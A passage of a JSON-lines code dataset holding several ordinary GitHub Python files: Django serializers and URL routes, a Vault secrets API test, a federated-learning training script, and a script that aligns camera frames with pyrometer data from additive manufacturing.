'danmaku'\nMSG_KIND_GIFT = 'gift'\nMSG_KIND_GUARD = 'guard'\nMSG_KIND_SUPER_CHAT = 'super-chat'\nMSG_KIND_INTERACT_WORD = 'interact-word'\nMSG_KIND_ENTRY_EFFECT = 'entry-effect'\nMSG_KIND_BATTLE_START = 'battle-start'\nMSG_KIND_BATTLE_END = 'battle-end'\nMSG_KIND_BATTLE_SETTLE = 'battle-settle'\n\nBODY_ADDON_KEY_ROOM_ID = 'recording_room_id'\n\nDB_COL_PK = 'id'\nDB_COL_TIME = 'recv_time'\nDB_COL_HASH = 'unique_data_hash'\nDB_COL_TYPE = 'type'\nDB_COL_CONTENT = 'message_content'\n","repo_name":"GongT/bilibili-live-danmaku-recorder","sub_path":"src/mylib/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"23216102808","text":"\"\"\"Teacher serializer.\"\"\"\r\n\r\n# Django\r\nfrom django.shortcuts import get_object_or_404\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\n\r\n# Django REST Framework\r\nfrom rest_framework import serializers\r\n\r\n# Models\r\nfrom api.users.models import (\r\n User,\r\n Subscription\r\n)\r\nfrom api.programs.models import (\r\n ProgramTopic,\r\n VideoTopic,\r\n PodcastTopic,\r\n PlaylistTopic\r\n\r\n)\r\n\r\n# Serializes\r\nfrom .videos import VideoModelSerializer\r\n\r\n# Utils\r\nfrom datetime import timedelta\r\n\r\n\r\nclass ProgramTopicModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n videos = serializers.SerializerMethodField(read_only=True)\r\n playlists = serializers.SerializerMethodField(read_only=True)\r\n podcasts = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = ProgramTopic\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'name',\r\n 'picture',\r\n 'videos',\r\n 'playlists',\r\n 'podcasts',\r\n 'color',\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n def get_videos(self, obj):\r\n videos = VideoTopic.objects.filter(topic=obj.id).count()\r\n return videos\r\n\r\n def get_podcasts(self, obj):\r\n podcasts = PodcastTopic.objects.filter(topic=obj.id).count()\r\n return podcasts\r\n\r\n def get_playlists(self, obj):\r\n playlists = PlaylistTopic.objects.filter(topic=obj.id).count()\r\n return playlists\r\n\r\n\r\nclass ProgramTopicCreateSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = ProgramTopic\r\n fields = (\r\n 'id',\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n def create(self, validated_data):\r\n\r\n user = self.context['request'].user\r\n validated_data['user'] = user\r\n validated_data['teacher'] = user.teacher\r\n\r\n program = self.context['program']\r\n validated_data['program'] = program\r\n\r\n return super().create(validated_data)\r\n\r\n\r\nclass ProgramTopicModifyModelSerializer(serializers.ModelSerializer):\r\n \"\"\"Profile model serializer.\"\"\"\r\n videos = serializers.SerializerMethodField(read_only=True)\r\n playlists = serializers.SerializerMethodField(read_only=True)\r\n podcasts = serializers.SerializerMethodField(read_only=True)\r\n\r\n class Meta:\r\n \"\"\"Meta class.\"\"\"\r\n\r\n model = ProgramTopic\r\n fields = (\r\n 'id',\r\n 'code',\r\n 'name',\r\n\r\n 'picture',\r\n 'videos',\r\n 'playlists',\r\n 'podcasts',\r\n 'color',\r\n )\r\n\r\n read_only_fields = (\r\n 'id',\r\n )\r\n\r\n def get_videos(self, obj):\r\n videos = VideoTopic.objects.filter(topic=obj.id).count()\r\n return videos\r\n\r\n def get_playlists(self, obj):\r\n playlists = PlaylistTopic.objects.filter(topic=obj.id).count()\r\n return playlists\r\n\r\n def get_podcasts(self, obj):\r\n podcasts = PodcastTopic.objects.filter(topic=obj.id).count()\r\n return podcasts\r\n\r\n return super(ProgramTopicModifyModelSerializer, self).update(instance, validated_data)\r\n\r\n\r\nclass AddVideoTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n video = self.context['video']\r\n if VideoTopic.objects.filter(video=video, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya contiene ese video')\r\n instance.videos.add(video)\r\n instance.save()\r\n return get_object_or_404(VideoTopic, video=video, topic=instance)\r\n\r\n\r\nclass RemoveVideoTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n video = self.context['video']\r\n if not VideoTopic.objects.filter(video=video, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya no contiene ese video')\r\n instance.videos.remove(video)\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass AddPodcastTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n podcast = self.context['podcast']\r\n if PodcastTopic.objects.filter(podcast=podcast, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya contiene ese podcast')\r\n instance.podcasts.add(podcast)\r\n instance.save()\r\n return get_object_or_404(PodcastTopic, podcast=podcast, topic=instance)\r\n\r\n\r\nclass RemovePodcastTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n podcast = self.context['podcast']\r\n if not PodcastTopic.objects.filter(podcast=podcast, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya no contiene ese podcast')\r\n instance.podcasts.remove(podcast)\r\n instance.save()\r\n return instance\r\n\r\n\r\nclass AddPlaylistTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n playlist = self.context['playlist']\r\n\r\n if PlaylistTopic.objects.filter(playlist=playlist, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya contiene ese playlist')\r\n instance.playlists.add(playlist)\r\n instance.save()\r\n return get_object_or_404(PlaylistTopic, playlist=playlist, topic=instance)\r\n\r\n\r\nclass RemovePlaylistTopicSerializer(serializers.Serializer):\r\n\r\n def update(self, instance, validated_data):\r\n playlist = self.context['playlist']\r\n if not PlaylistTopic.objects.filter(playlist=playlist, topic=instance).exists():\r\n raise serializers.ValidationError(\r\n 'Tu tema ya no contiene ese playlist')\r\n instance.playlists.remove(playlist)\r\n instance.save()\r\n return instance\r\n","repo_name":"alexhernandez-git/django-classline","sub_path":"api/programs/serializers/program_topics.py","file_name":"program_topics.py","file_ext":"py","file_size_in_byte":6067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8651380223","text":"import requests\nimport logging\nimport json.decoder\n\n# this version of the scripts\nversion = '1.0.3'\n\n# user agent\nuseragent = \"YourServersSuck/{}\".format(version)\n\n# debug request unfinished\ndef printdebugrequest(req):\n print(req.url)\n print(req.request.headers)\n print(req.headers)\n print(req.text)\n\ndef debugrequest(req):\n logging.debug(req.url)\n logging.debug(req.request.headers)\n logging.debug(req.headers)\n logging.debug(req.text)\n\ndef get(url, sess, *, rparams={}, headers={}, accesstoken=None, raw=True, **params):\n 'This is the base get request function'\n req = sess.get(url, params=params, headers={\n 'Authorization': accesstoken,\n 'User-agent': useragent,\n **headers\n }, **rparams)\n #printdebugrequest(req)\n try:\n j = req.json()\n except json.decoder.JSONDecodeError:\n raw = False\n if raw: return j\n else: return req.text\n\n","repo_name":"Alto1772/crone-utils","sub_path":"skins/datas/reqbase.py","file_name":"reqbase.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23573334767","text":"from http import HTTPStatus\nfrom random import randrange\n\nimport pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.orm import Session\n\nfrom mlrun import mlconf\nfrom mlrun.api import schemas\n\n# Set a valid Vault token to run this test.\n# For this test, you must also have a k8s cluster available (minikube is good enough).\nuser_token = \"\"\n\n\ndef _set_vault_mlrun_configuration():\n mlconf.secret_stores.vault.url = \"http://localhost:8200\"\n mlconf.namespace = \"default-tenant\"\n mlconf.secret_stores.vault.user_token = user_token\n\n\n@pytest.mark.skipif(user_token == \"\", reason=\"no vault configuration\")\ndef test_vault_create_project_secrets(db: Session, client: TestClient):\n _set_vault_mlrun_configuration()\n\n project_name = f\"prj-{randrange(1000)}\"\n\n data = {\"provider\": \"vault\", \"secrets\": {\"secret1\": \"value1\", \"secret2\": \"value2\"}}\n\n # Test project secrets\n response = client.post(f\"/api/projects/{project_name}/secrets\", json=data)\n assert response.status_code == HTTPStatus.CREATED.value\n\n params = {\"provider\": schemas.SecretProviderName.vault.value, \"secrets\": None}\n headers = {schemas.HeaderNames.secret_store_token: user_token}\n\n response = client.get(\n f\"/api/projects/{project_name}/secrets\", headers=headers, params=params\n )\n secrets = response.json()[\"secrets\"]\n assert secrets == data[\"secrets\"]\n","repo_name":"jasonnIguazio/ghpages-mlrun","sub_path":"tests/api/api/test_secrets.py","file_name":"test_secrets.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28889920814","text":"from django.conf.urls import url\nfrom . import views\nfrom django.contrib.auth.views import logout\n\napp_name = 'composer'\n\nurlpatterns = [\n\n # /composer/\n url(r'^$', views.HomeView.as_view(), name='home'),\n\n # /composer/registration\n url(r'^registration$', views.RegistrationView.as_view(), name='registration'),\n\n # /composer/login\n url(r'^login$', views.LoginView.as_view(), name='login'),\n\n # /composer/profile\n url(r'^profile$', views.ProfileView.as_view(), name='profile'),\n\n # /composer/logout\n url(r'^logout$', logout, {'next_page': '/composer/'},name='logout'),\n\n # /composer/projects\n url(r'^projects$', views.ProjectsView.as_view() ,name='projects'),\n\n # /composer/projects/new\n url(r'^projects/new$', views.NewProjectView.as_view() ,name='new_project'),\n\n # /composer/project/\n url(r'^project/(?P[0-9]+)/$', views.CurrentProjectView.as_view() ,name='project'),\n\n # /composer/project//delete\n url(r'^project/(?P[0-9]+)/delete/', views.SongDelete.as_view() ,name='delete-song'),\n\n]\n","repo_name":"matei-r/music_processing","sub_path":"composer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18091303071","text":"import argparse\nimport logging\nimport os.path\nimport time\n\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom tqdm import tqdm\nfrom transformers import RobertaConfig, RobertaTokenizer, RobertaModel\n\nfrom data.manager.codedoc_data_manager import CodeDocDataManager\nfrom data.preprocess.codedoc_preprocessor import CodeDocPreprocessor\nfrom main.initialize import set_seed, get_fl_algorithm_initializer, add_code_doc_args\nfrom model.biseq2seq_model import Seq2Seq\nfrom train.codedoc_fedrod_trainer import CodeDocFedRodTrainer\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser = add_code_doc_args(parser)\n args = parser.parse_args()\n\n logging.basicConfig(\n level=logging.INFO,\n format='%(process)s %(asctime)s.%(msecs)03d - {%(module)s.py (%(lineno)d)} - %(funcName)s(): %(message)s',\n datefmt='%Y-%m-%d,%H:%M:%S')\n logging.info(args)\n\n set_seed(args.manual_seed)\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n config_class, model_class, tokenizer_class = RobertaConfig, RobertaModel, RobertaTokenizer\n\n config = config_class.from_pretrained(args.model_name)\n tokenizer = tokenizer_class.from_pretrained(args.model_name)\n\n encoder = model_class.from_pretrained(args.model_name, config=config)\n decoder_layer = nn.TransformerDecoderLayer(d_model=config.hidden_size, nhead=config.num_attention_heads)\n decoder = nn.TransformerDecoder(decoder_layer, num_layers=6)\n model = Seq2Seq(encoder=encoder, decoder=decoder, config=config,\n beam_size=args.beam_size, max_length=args.max_target_length,\n sos_id=tokenizer.cls_token_id, eos_id=tokenizer.sep_token_id, p_head=True)\n\n preprocessor = CodeDocPreprocessor(args=args, tokenizer=tokenizer)\n manager = CodeDocDataManager(args, preprocessor)\n\n if args.do_train:\n model.to(device)\n\n train_loader_list, train_data_num_list, label_num_list = manager.load_federated_data(False, 'train',\n args.train_data_file,\n args.train_batch_size,\n args.train_partition_file)\n eval_loader = manager.load_federated_data(True, 'eval', args.eval_data_file, args.eval_batch_size)\n test_loader = manager.load_federated_data(True, 'test', args.eval_data_file, args.eval_batch_size,\n max_size=1000)\n\n args.cls_num_list = [torch.Tensor(cls_num) for cls_num in label_num_list]\n args.label_weight = [torch.Tensor(cls_num) / sum(cls_num) for cls_num in label_num_list]\n\n fl_algorithm = get_fl_algorithm_initializer(args.fl_algorithm)\n server_func = fl_algorithm(server=True)\n client_func = fl_algorithm(server=False)\n\n p_head_state_list = [{} for _ in range(args.client_num_in_total)]\n for name, param in model.state_dict().items():\n if 'p_head' in name:\n for i in range(args.client_num_in_total):\n p_head_state_list[i][name] = param.clone().detach().cpu()\n\n # counter_list = [Counter() for _ in range(args.client_num_in_total)]\n # vocab_weight_list = [[0 for _ in range(config.vocab_size)] for _ in range(args.client_num_in_total)]\n # for loader, counter, vocab_weight in tqdm(zip(train_loader_list, counter_list, vocab_weight_list),\n # desc=\"counting vocab\"):\n # for batch in loader:\n # source_ids, _, target_ids, _ = batch\n # for i in range(source_ids.shape[0]):\n # counter.update(source_ids[i].tolist())\n # counter.update(target_ids[i].tolist())\n # for key, value in counter.items():\n # vocab_weight[int(key)] = value\n # vocab_weight_list = torch.Tensor(vocab_weight_list)\n # vocab_weight_list = vocab_weight_list / vocab_weight_list.sum(dim=1).view(-1, 1)\n\n trainer = CodeDocFedRodTrainer(args, device, model, tokenizer, p_head_state_list=p_head_state_list)\n\n clients = client_func(train_loader_list, train_data_num_list, None, device, args, trainer)\n server = server_func(clients, None, eval_loader, test_loader, args, device, trainer)\n server.run()\n\n save_dir = os.path.join(args.cache_dir, \"model\", args.fl_algorithm)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n torch.save(model.state_dict(), os.path.join(save_dir, 'model.pt'))\n torch.save(trainer.p_head_state_list, os.path.join(save_dir, 'p_head.pt'))\n # torch.save(vocab_weight_list, os.path.join(save_dir, 'vocab.pt'))\n torch.save(args.label_weight, os.path.join(save_dir, \"label_weight.pt\"))\n\n if args.do_test:\n model.load_state_dict(torch.load(os.path.join(args.load_model, 'model.pt')))\n model.to(device)\n\n test_loader = manager.load_federated_data(True, 'test', args.test_data_file, args.eval_batch_size)\n\n p_head_state_list = torch.load(os.path.join(args.load_model, 'p_head.pt'))\n # vocab_weight_list = torch.load(os.path.join(args.load_model, 'vocab.pt'))\n label_weight_list = torch.load(os.path.join(args.load_model, 'label_weight.pt'))\n\n trainer = CodeDocFedRodTrainer(args, device, model, tokenizer, test_dl=test_loader,\n p_head_state_list=p_head_state_list, label_weight_list=label_weight_list)\n g_bleu = trainer.test()\n with open(os.path.join(args.output_dir, 'fedrod_bleu_test_result.txt'), 'a') as f:\n f.write(\"TEST TIME:%s\\n\" % time.asctime(time.localtime(time.time())))\n f.write(\"global bleu-4: %s\\n\\n\" % g_bleu)\n bleu_list = []\n for i in range(len(p_head_state_list)):\n trainer.set_model_params(trainer.get_model_params(), i)\n l_bleu = trainer.test(i)\n bleu_list.append(l_bleu)\n with open(os.path.join(args.output_dir, 'fedrod_bleu_test_result.txt'), 'a') as f:\n for i, bleu in enumerate(bleu_list):\n f.write(\"client %s bleu-4: %s\\n\\n\" % (i, bleu))\n f.write(\"avg bleu-4: %s\\n\\n\" % np.mean(bleu_list))\n f.write(\"max bleu-4: %s\\n\\n\" % np.max(bleu_list))\n f.write(\"min bleu-4: %s\\n\\n\" % np.min(bleu_list))\n","repo_name":"O4thkeeper/FedCode","sub_path":"main/codedoc_fedrod.py","file_name":"codedoc_fedrod.py","file_ext":"py","file_size_in_byte":6514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20693869995","text":"\"\"\"\nTransform data from the Aconity CMOS high speed camera and assign machine\ncoordinates by utilizing data from the pyrometers.\n\"\"\"\nimport pickle\nimport math\nimport csv\nimport statistics\nimport imageio\nimport numpy as np\nimport os\nimport pylab\nimport time\nimport pandas\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\n\n# Edit this line to select the job to be processed\njob_name = \"B002\"\n# Specify the CMOS camera settings.\nOffset_X = 832\nOffset_Y = 808\nWidth = 256\nHeight = 300\n\n# Specify settings for evaluating the main script\n# The script prints what it's doing\nverbal =True\n# Plots are generated and shown for intermediate results\nvisual = [False,False,False,False,False,False,False,False]\n# 0: ON/OFF plot camera\n# 1: ON/OFF plot pyrometer1\n# 2: combined ON/OFF plot\n# 3: scatter plot of image intensity @x,y position\n# 4: scatter plot of ON/OFF @x,y position\n# 5: scatter plot of vector length vs. slope\n# 6: scatter plot of melt pool area vs. pyrometer value\n# 7: two adjacent scatter plots with image position and pyrometer position\n\n# Tell program if it should only process one selected part/layer combination\n# Set True or False\ncherrypick =False\n# If set to true, specify which one\ncherry = {\n \"part\" : \"5\",\n \"layer\": \"0-06\"\n}\n\n# Set limit to reduce computing time for image processing. Default = None\nimage_number_limit =None\n\n\ndef create_file_list(job, **kwargs):\n \"\"\"\n Creates a list of dictionaries with data of and paths to individual part \n files, based on the CMOS data.\n \"\"\"\n file_list = []\n filename_camera_prefix = \"Jobs/{0}/hsCamera/\".format(job)\n filename_pyro1_prefix = \"Jobs/{0}/2Pyrometer/pyrometer1/\".format(job)\n filename_pyro2_prefix = \"Jobs/{0}/2Pyrometer/pyrometer2/\".format(job)\n\n # Check if only cherry picked files are requested or all job files\n if kwargs.get('cherry', None) is not None:\n part_number = kwargs.get(\"cherry\")[\"part\"]\n layer = kwargs.get(\"cherry\")[\"layer\"]\n filename_camera = filename_camera_prefix + part_number + \"/\" + layer + \".mkv\"\n l_pyro = layer.split('.')[0].replace(\"-\",\".\") + '.pcd'\n filename_pyro1 = filename_pyro1_prefix + part_number + \"/\" + l_pyro\n filename_pyro2 = filename_pyro2_prefix + part_number + \"/\" + l_pyro\n file_dict ={'filename_camera':filename_camera,\n 'filename_pyro1': filename_pyro1,\n 'filename_pyro2': filename_pyro2,\n 'part_number':part_number,\n 'layer':layer.split('.')[0]}\n file_list.append(file_dict)\n else:\n part_number_list = os.listdir(filename_camera_prefix)\n # Create a dictionary with file information for every single file\n for part_number in part_number_list:\n layer_list = os.listdir(filename_camera_prefix + part_number)\n for layer in layer_list:\n if layer.endswith('.pkl'):\n # ignore the previously processed files\n continue\n filename_camera = filename_camera_prefix + part_number + \"/\" + layer\n l_pyro = layer.split('.')[0].replace(\"-\",\".\") + '.pcd'\n filename_pyro1 = filename_pyro1_prefix + part_number + \"/\" + l_pyro\n filename_pyro2 = filename_pyro2_prefix + part_number + \"/\" + l_pyro\n file_dict ={'filename_camera':filename_camera,\n 'filename_pyro1': filename_pyro1,\n 'filename_pyro2': filename_pyro2,\n 'part_number':part_number,\n 'layer':layer.split('.')[0]}\n file_list.append(file_dict)\n return(file_list)\n\ndef process_mkv(file):\n \"\"\"\n Process a .mkv file into a dataframe.\n \"\"\"\n image_array = []\n image_index_array = []\n intensity_array = []\n meltpool_area_array = []\n brightest_pixel_array = []\n\n\n CMOS_video = imageio.get_reader(file['filename_camera'], 'ffmpeg')\n # Image borders where the melt pool is situated:\n x_min = 850\n x_max = 950\n y_min = 810\n y_max = 910\n # Set a threshhold value to prevent melt pools from being classified as\n # noise.\n noise_threshold_value = 23\n meltpool_threshold_value = 23\n # Create an empty noise mask which is subtracted from all pictures.\n noise_mask = np.full([y_max-y_min,x_max-x_min],0)\n noise_picture_total = 0\n\n for frame_number, image in enumerate(CMOS_video, start=1):\n if image_number_limit is not None and frame_number > image_number_limit:\n break\n # Convert image to black and white\n image_bw = image[:,:,0].reshape(image.shape[0],image.shape[1])\n\n # Crop image to relevant area\n image_cropped = image_bw[\n (y_min - Offset_Y):(y_max - Offset_Y),\n (x_min - Offset_X):(x_max - Offset_X)\n ]\n # Update noise_mask\n if np.amax(image_cropped) < noise_threshold_value:\n noise_mask += image_cropped\n noise_picture_total +=1\n\n image_array.append(image_cropped)\n image_index_array.append(frame_number)\n\n # average noise mask\n noise_mask = np.divide(noise_mask,\n np.full(noise_mask.shape,noise_picture_total))\n\n for index, image in enumerate(image_array):\n # denoise images\n image_min_noise = (image - noise_mask)\n # convert negative pixels to 0\n image_min_noise[image_min_noise < 0] = 0\n image_array[index] = image_min_noise.astype(np.uint8)\n # calculate total intensity\n intensity_array.append(np.sum(image_array[index]))\n # find brightest pixel. Is required for normalizing image brightness\n # when displayed\n brightest_pixel_array.append(np.max(image_array[index]))\n\n # calculate melt pool area\n image_area = image_min_noise\n image_area[image_area< meltpool_threshold_value] = 0\n image_area[image_area>= meltpool_threshold_value] = 1\n meltpool_area = np.sum(image_area)\n meltpool_area_array.append(meltpool_area)\n\n intensity_array = np.array(intensity_array, dtype=np.int64)\n\n\n # Calculate upper threshold value for Laser OFF intensity level\n # Note: the first value usually is zero\n OFF_level_array = np.array(intensity_array[1:21])\n mean = statistics.mean(OFF_level_array)\n OFF_threshold = mean + 6 * statistics.pstdev(OFF_level_array,mean)\n if verbal:\n print(\"Threshold value = \" + str(OFF_threshold))\n \n # Determine if below or above threshold\n signs_array = (np.sign(intensity_array - OFF_threshold) +1)/2\n \n # store processed images as a python pickle file\n df_images = pandas.DataFrame(index=image_index_array)\n df_images['image'] = image_array\n df_images['area_threshold'] = meltpool_threshold_value\n df_images['brightest_pixel'] = np.max(brightest_pixel_array)\n filename_pkl = file['filename_camera'].replace(\".mkv\",\"_images.pkl\")\n df_images.to_pickle(filename_pkl)\n \n # Create dataframe that is returned.\n # This dataframe is not stored here, since it makes more sense to store it \n # after it has been extended with coordinates.\n df = pandas.DataFrame(index=image_index_array)\n df['intensity'] = intensity_array\n df['meltpool_area'] = meltpool_area_array\n df['ON_OFF'] = signs_array\n df['threshold'] = OFF_threshold\n df['part'] = file['part_number']\n df['layer'] = file['layer']\n df['index'] = image_index_array\n return df\n\n\ndef process_pcd(file):\n df = pandas.DataFrame()\n with open(file['filename_pyro1'], \"r\", newline='\\n') as pyro_file:\n reader = csv.reader(pyro_file, delimiter=' ')\n scanner_id = next(reader)\n scanner_protocol = next(reader)\n scanner_x_field_size = next(reader)\n scanner_y_field_size = next(reader)\n scanner_x_offset = next(reader)\n scanner_y_offset = next(reader)\n scanner_rotation = next(reader)\n scanner_field_correction_file = next(reader)\n pyro_data = np.array(list(reader)).astype(np.int64)\n assert np.sum(pyro_data[:,2]-pyro_data[:,3]) == 0, \"The data in the two pyro value columns does not match\"\n # Compute velocity profile\n dt = 1 # time interval for dx/dt, dy/dt\n Dx = np.diff(pyro_data[:,0], dt).astype(np.float)\n Dy = np.diff(pyro_data[:,1], dt).astype(np.float)\n Dx_mm, Dy_mm = bit2mm(Dx, Dy)\n velocity_array_mm = np.linalg.norm(np.stack((Dx_mm,Dy_mm), axis=1), axis=1) / dt\n window_width = 20\n velocity_array_smoothed_mm = np.convolve(velocity_array_mm, np.ones(window_width),mode='same') / window_width\n # Convert velocity from mm*100kHz to mm/s\n velocity_array_smoothed_mmps = velocity_array_smoothed_mm * 1e5\n # Determine vectors based upon hatch speed\n scan_velocity_hatch_mmps = 900 #mm/s\n scan_velocity_contour_mmps = 1200 #mm/s\n # check lower boundary\n signs_array_lower = (np.sign(velocity_array_smoothed_mmps - (scan_velocity_hatch_mmps -200)) + 1)/2\n # check upper boundary\n signs_array_upper = (np.sign(scan_velocity_hatch_mmps + 300 - velocity_array_smoothed_mmps) +1)/2\n initial_high_speed = np.where(signs_array_upper < 1)[0]\n try:\n lower = initial_high_speed[0]\n upper = initial_high_speed[-1]\n signs_array_upper[np.arange(lower-50,upper+71,1)] = 0\n signs_array = np.multiply(signs_array_lower, signs_array_upper)\n except:\n print(\"Warning: No initial high velocity in pyrometer data detected.\")\n signs_array = np.multiply(signs_array_lower, signs_array_upper)\n\n # Pack data into dataframe and return\n df['x'] = pyro_data[dt:,0]\n df['y'] = pyro_data[dt:,1]\n df['intensity'] = pyro_data[dt:,2]\n df['velocity'] = velocity_array_smoothed_mmps\n df['ON_OFF'] = signs_array\n df['threshold'] = scan_velocity_hatch_mmps\n filename_pkl = file['filename_pyro1'].replace(\".pcd\",\".pkl\")\n df.to_pickle(filename_pkl)\n return df\n\n\ndef extend_CMOS_data(df_camera, df_pyro):\n \"\"\"\n Extend the CMOS camera dataframe with coordinates for each image, derived\n from the pyrometer data.\n \"\"\"\n # Create dictionary for results which do not fit in the df_camera or df_pyro\n results = {}\n\n # note: interval value comes from experimenting, is dependent on skywriting \n # strategy.\n camera_off_interval = 4\n camera_ON = np.where(df_camera['ON_OFF'] == 1)[0]\n # calculate distance between ON images\n camera_dist_on_on = np.diff(camera_ON)\n # check where distance is corresponds to a minimal OFF-interval expected \n # between 2 scan vectors. The indice corresponds to the start of the\n # interval.\n camera_off_interval_start = np.where(camera_dist_on_on >= camera_off_interval)[0]\n camera_off_interval_length = camera_dist_on_on[camera_off_interval_start]\n # find midpoints of intervals within the CMOS indices\n camera_off_midpoints = np.round(camera_ON[camera_off_interval_start] + 1 +\n camera_off_interval_length/2)\n camera_num_scan_vectors = len(camera_off_interval_start) + 1\n results.update({\n \"camera_midpoints\": camera_off_midpoints,\n \"camera_interval_length\": camera_off_interval_length,\n \"camera_num_vectors\": camera_num_scan_vectors})\n\n # do the same thing for the pyrometer data\n # note: interval value comes from experimenting, is dependent on skywriting \n # strategy.\n pyro_off_interval = 40\n pyro_ON = np.where(df_pyro['ON_OFF'] == 1)[0]\n # calculate distance between ON data points\n pyro_dist_on_on = np.diff(pyro_ON)\n # check where distance is corresponds to a minimal OFF-interval expected \n # between 2 scan vectors. The indice corresponds to the start of the\n # interval.\n pyro_off_interval_start = np.where(pyro_dist_on_on >= pyro_off_interval)[0]\n pyro_off_interval_length = pyro_dist_on_on[pyro_off_interval_start]\n # find midpoints of intervals within the pyrometer indices\n pyro_off_midpoints = np.round(pyro_ON[pyro_off_interval_start] + 1 +\n pyro_off_interval_length/2)\n pyro_num_scan_vectors = len(pyro_off_interval_start) + 1\n # todo (optional): remove very short scan vectors from pyro vectors if the \n # camera is unable to recognize them.\n results.update({\n \"pyro_midpoints\": pyro_off_midpoints,\n \"pyro_interval_length\": pyro_off_interval_length,\n \"pyro_num_vectors\": pyro_num_scan_vectors})\n results.update({\"slopes\":[]})\n results.update({\"slope_errors\":[]})\n results.update({\"camera_delta\":[]})\n results.update({\"pyro_delta\":[]})\n\n print(\"DETECTED MIDPOINTS: CAMERA={} PYRO={}\".format(camera_num_scan_vectors,pyro_num_scan_vectors))\n df_camera['index_pyro'] = np.nan\n if camera_num_scan_vectors == pyro_num_scan_vectors:\n print(\"Midpoint numbers match, do pointwise scaling\")\n # linearly scale the CMOS timescales between each midpoint interval\n for index, camera_midpoint in enumerate(camera_off_midpoints[:-1]):\n camera_start = camera_midpoint\n camera_end = camera_off_midpoints[index+1]\n pyro_start = pyro_off_midpoints[index]\n pyro_end = pyro_off_midpoints[index+1]\n # compute linear scaling factors\n camera_delta = camera_end-camera_start\n pyro_delta = pyro_end-pyro_start\n slope = (pyro_delta)/(camera_delta)\n results[\"slopes\"].append(slope)\n slope_err = slope_error(camera_delta,pyro_delta)\n results[\"slope_errors\"].append(slope_err)\n results[\"camera_delta\"].append(camera_delta)\n results[\"pyro_delta\"].append(pyro_delta)\n # get offset from end points since they tend to be more accurate \n # than start points\n offset = pyro_end - slope*camera_end\n df_camera.loc[ int(camera_start):int(camera_end),'index_pyro' ] = df_camera.loc[\n int(camera_start):int(camera_end),'index'] * slope + offset\n # linearly scale all images outside the midpoints\n camera_start = camera_off_midpoints[0]\n camera_end = camera_off_midpoints[-1]\n pyro_start = pyro_off_midpoints[0]\n pyro_end = pyro_off_midpoints[-1]\n # compute linear scaling factors\n slope = (pyro_end - pyro_start)/(camera_end - camera_start)\n offset = pyro_end - slope*camera_end\n df_camera.loc[:int(camera_start),'index_pyro'] = df_camera.loc[\n :int(camera_start),'index'] * slope + offset\n df_camera.loc[int(camera_end):,'index_pyro'] = df_camera.loc[\n int(camera_end):,'index'] * slope + offset\n # round values to the closest index\n df_camera['index_pyro'] = df_camera['index_pyro'].round()\n results.update({\"method\": \"linear pointwise\"})\n else:\n print(\"Midpoint numbers do not match, do simple linear scaling\")\n # linearly scale the entire CMOS timescale\n camera_ON = np.where(df_camera['ON_OFF'] == 1)\n camera_ON_start = camera_ON[0][0]\n camera_ON_end = camera_ON[0][-1]\n pyro_ON = np.where(df_pyro['ON_OFF'] == 1)\n pyro_ON_start = pyro_ON[0][0]\n pyro_ON_end = pyro_ON[0][-1]\n # compute linear scaling factors\n camera_delta=camera_ON_end-camera_ON_start\n pyro_delta=pyro_ON_end-pyro_ON_start\n slope = (pyro_delta)/(camera_delta)\n results[\"slopes\"].append(slope)\n slope_err = slope_error(camera_delta,pyro_delta)\n results[\"slope_errors\"].append(slope_err)\n results[\"camera_delta\"].append(camera_delta)\n results[\"pyro_delta\"].append(pyro_delta)\n offset = pyro_ON_end - slope * camera_ON_end\n df_camera['index_pyro'] = df_camera['index'] * slope + offset\n df_camera['index_pyro'] = df_camera['index_pyro'].round()\n results.update({\"method\": \"linear single\"})\n\n # compute machine coordinates of each camera image\n x_array = []\n y_array = []\n pyro_value_array = []\n for index_pyro in df_camera['index_pyro']:\n x_array.append(df_pyro.at[int(index_pyro),'x'],)\n y_array.append(df_pyro.at[int(index_pyro),'y'],)\n pyro_value_array.append(df_pyro.at[int(index_pyro),'intensity'],)\n df_camera['x'] = x_array\n 